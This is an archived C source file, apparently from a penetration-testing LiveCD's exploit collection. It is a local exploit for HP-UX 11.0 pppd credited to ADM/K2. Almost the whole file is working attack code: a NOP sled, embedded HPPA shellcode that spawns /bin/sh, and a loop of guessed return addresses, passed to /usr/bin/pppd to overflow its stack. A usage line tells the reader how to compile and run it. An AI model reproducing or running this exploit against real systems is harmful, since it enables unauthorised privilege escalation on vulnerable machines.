home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / local / pppd.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  73 lines

  1. /*      Copyright (c) 2000 ADM                                  */
  2. /*      All Rights Reserved                                     */
  3. /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
  4. /*      The copyright notice above does not evidence any        */
  5. /*      actual or intended publication of such source code.     */
  6. /*                                                              */
  7. /*      Title:        HP-UX pppd                                */
  8. /*      Tested under: HP-UX 11.0                                */
  9. /*      By:           K2                                        */
  10. /*      Use:          gcc -o pppd hp-pppd.c ; ./pppd            */
  11. /*                    (more hp to come :)                       */
  12. /*                                                              */
  13.  
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <sys/types.h>
  17. #include <unistd.h>
  18.  
  19. #define BUF_LENGTH 22000
  20. #define STACK_OFFSET 8042
  21. #define EXTRA 3000
  22. #define HPPA_NOP 0x3902800b /* weirdo nop */
  23.  
  24. u_char hppa_shellcode[] =
  25. "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
  26. "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
  27. "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff\xff";
  28.  
  29. u_long get_sp(void)
  30. {
  31.    __asm__("copy %sp,%ret0 \n");
  32. }
  33.  
  34. int main(int argc, char *argv[])
  35. {
  36.    char buf[BUF_LENGTH + 8];
  37.    unsigned long targ_addr;
  38.    u_long *long_p;
  39.    u_char *char_p;
  40.    int i, code_length = strlen(hppa_shellcode),dso=STACK_OFFSET,xtra=EXTRA;
  41.  
  42.    if(argc > 1) dso+=atoi(argv[1]);
  43.    if(argc > 2) xtra+=atoi(argv[2]);
  44.  
  45.    long_p = (u_long *) buf;
  46.  
  47.    for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++)
  48.      *long_p++ = HPPA_NOP;
  49.  
  50.    char_p = (u_char *) long_p;
  51.  
  52.    char_p--;  /* weirdness alighnment issue */
  53.  
  54.    for (i = 0; i < code_length; i++)
  55.      *char_p++ = hppa_shellcode[i];
  56.  
  57.    targ_addr = get_sp() - dso;
  58.  
  59.    for (i = 0; i < xtra /4; i++)
  60.    {
  61.       *char_p++ =(targ_addr>>24)&255;
  62.       *char_p++ =(targ_addr>>16)&255;
  63.       *char_p++ =(targ_addr>>8)&255;
  64.       *char_p++ =(targ_addr)&255;
  65.    }
  66.   
  67.    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",targ_addr,strlen(buf),xtra,dso);
  68.  
  69.    execl("/usr/bin/pppd","pppd", buf,(char *) 0);
  70.    perror("execl failed");
  71.    return(-1);
  72. }
  73. /*                   www.hack.co.za   [20 November 2000]*/